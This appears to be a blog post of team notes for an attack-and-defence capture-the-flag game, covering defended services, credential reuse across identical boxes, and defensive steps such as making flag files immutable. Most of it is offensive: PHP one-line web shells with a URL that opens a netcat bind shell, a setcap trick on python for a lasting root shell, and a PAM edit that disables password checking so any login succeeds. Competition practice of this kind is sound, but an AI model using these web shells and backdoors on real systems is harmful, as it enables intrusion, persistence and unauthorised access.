Team of 4 or 5

One Linux Box
One Window Box

If there are root/admin passwords, change them immediately. Change any other passwords on the box as well, as long as they aren’t used by the scoring bot/service.

Defending 2-3 services on each box. I don’t remember all the services but there was ftp and a wikipedia (TikiWiki). I think there was another web-service as well.

FTP. Your boxes are the same as everyone elses. Get login details so you can remote into your opponents boxes.

Key Point: Any login that works on your box, works on other peoples box. If you have a login to the TikiWiki admin, you have a login to THEIR TikiWiki.

WEB STUFF:
web shell: 

<?php echo exec($_GET["password"]);?>
<?php echo shell_exec($_GET["password"]);?>
<?php system($_GET["password"],$retval);?>
<?php passthru($_GET["password"]);?>

Use it like this:

http://target_ip/filename_with_this_phpline.php?password=nc -l -p 59741 -e /bin/sh

DEFENSE:
Change permissions on flag files to ONLY be readable.
Make your flag files immutable (unable to be changed)

chattr +i /path/to/flag/file

OFFENSE:
If you get on another persons box, heres some sneaky tips (that require root):

setcap CAP_SETUID=ep `which python`

^ after doing this, you can get a root shell at any time: python -c "import os;os.setuid(0);os.seteuid(0);os.system('/bin/bash')"'

This sets the suid bit on a program, without having the suid bit set 😀

———————————

Look for these lines like this in the /etc/pam.d/common-auth file:

auth [success=1 default=ignore] pam_unix.so nullok_secure
auth requisite pam_deny.so

Change it to this:

auth [success=1 default=1] pam_unix.so nullok_secure

This allows any username/password combination to work. You basically nullify password checking, all logins are allowed.

———————————-

MYSQL (if its there):

mysql -p   (connects as current user, you provide a password. Try without -p for passwordless login)
show databases;   (shows databases)
connect DB_NAME;
show tables;
select * from TABLE_NAME;   (this should get you started)

Leave a Reply

Your email address will not be published.